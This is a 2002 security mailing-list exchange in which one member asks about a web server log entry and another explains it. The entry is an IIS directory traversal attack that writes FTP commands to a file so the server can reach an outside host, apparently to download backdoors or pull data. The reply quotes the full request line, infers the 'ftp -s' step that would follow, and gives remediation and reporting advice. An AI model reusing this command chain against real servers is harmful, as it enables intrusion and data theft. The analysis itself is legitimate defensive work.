[Dshield] Any ideas...

van Niekerk Niel nielvanniekerk at oldmutual.com
Fri Jun 14 09:28:37 GMT 2002


Richard Golodner wrote:

> Do any of you know what this might be ? It has started to show up in my
> logs and I am no exploit expert. Any suggestions or wild guesses are
> appreciated. 
> 					Thanks, Rich
> 
> 
> 	GET, /scripts/..%5c..%5ctemp/_/_tmp/cnd.exe,
> /echo.open%20206.45.20.139>c:\temp\_\_tmp\f.txt&echo.anonymous%20e at mail.co
> m>>c:\temp\_\_tmp\f.txt&c+echo.binary>>c:\temp\_\_tmp\f.txt, 

Hi Richard,

This is what it looks like to me:

A directory traversal attempt to a non-standard path (c:\temp\
_\_tmp\cnd.exe) I would assume that cnd.exe is just a straight copy of
c:\winnt\system32\cmd.exe (most likely) or some other windows command shell
(unlikely too much hassle), the exploit then creates f.txt in the same
directory as cnd.exe containing the following ftp commands:

open 206.45.20.139
anonymous e at mail.com
binary

(This all assumes success in the dir traversal and the file cnd.exe actually
exists in that path, I am not sure why "they" didn't just use the standard
<server>/scripts/../../winnt/system32/cmd.exe)

Why would this be done?
I would guess that there should be more commands piped to the FTP file to
transfer some files (either a GET request to download some backdoor utils or
a PUT to grab data files, or the backup SAM file or some such thing) and
then another traversal command execution to use the text file as an input
for an FTP session (of the "ftp -s:f.txt" type).

What should you do?
-I assume you are running your web server on NT/WIN2K, if it is running on
Linux, this specific attempt will not affect you at all, and you can ignore
the rest of this, however you must still remain up with security fixes and
good practices...
- Look in your logs to see what responses your server gave to the dir
traversal and other commands, if it is a 404 or 403 (file not found / access
denied) you should be OK, but this still warrants some further
investigation. If not, you should immediately remove the server from the
Internet and your network and either do an audit to see what happened or
rebuild it in totality installing all the correct patches for your web
server BEFORE you reconnect it to the net. (If you are running IIS you are
probably also infected with NIMDA and/or Code Red if this traversal worked)
- Regardless of the exploits success or not Contact the owners of the
owners/ISP of the FTP server (see below) and notify them of this attempted
exploit.

The FTP server the exploit tries to connect to resolves to:
206-45-20-139.mts.ne

Trying whois -h whois.arin.net 206.45.20.139
MBnet Networking Inc (NETBLK-MANITOBA-2)
   15 Gillson Street
   Winnipeg, Manitoba R3T 5V6
   CA

   Netname: MANITOBA-2
   Netblock: 206.45.0.0 - 206.45.255.255
   Maintainer: MB

   Coordinator:
      Pruden, Jason  (JP1488-ARIN)  netadmin at mts.mb.ca
      +1 (204) 941-7573

Hope this helps

Niel



-----Original Message-----
From: Richard Golodner [mailto:RGolodner at aetea.com]
Sent: 13 June 2002 17:35
To: 'list at dshield.org'
Subject: [Dshield] Any ideas...


> Do any of you know what this might be ? It has started to show up in my
> logs and I am no exploit expert. Any suggestions or wild guesses are
> appreciated. 
> 					Thanks, Rich
> 
> 
> 	GET, /scripts/..%5c..%5ctemp/_/_tmp/cnd.exe,
> /echo.open%20206.45.20.139>c:\temp\_\_tmp\f.txt&echo.anonymous%20e at mail.co
> m>>c:\temp\_\_tmp\f.txt&c+echo.binary>>c:\temp\_\_tmp\f.txt, 

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list


///
*******************************************************************

The contents of this message and any attachments are 
intended solely for the addressee's use and may be legally 
privileged and/or confidential. If you are not the 
addressee indicated in this message, any retention,
distribution, copying or use of this message is strictly
prohibited. If you received this message in error, kindly
notify the sender immediately by reply e-mail and then
destroy the message and any copies thereof.

Opinions, conclusions and other information in this 
message must be understood as neither given nor 
endorsed by Old Mutual Banking Services and may be 
personal to the sender. Since e-mail communication
cannot be guaranteed to be secure, Old Mutual Banking
Services does not make any representation or give any 
guarantee concerning the confidentiality, security,
accuracy or completeness of any e-mail. Any liability for
viruses is excluded to the fullest extent permitted by law.

*******************************************************************




More information about the list mailing list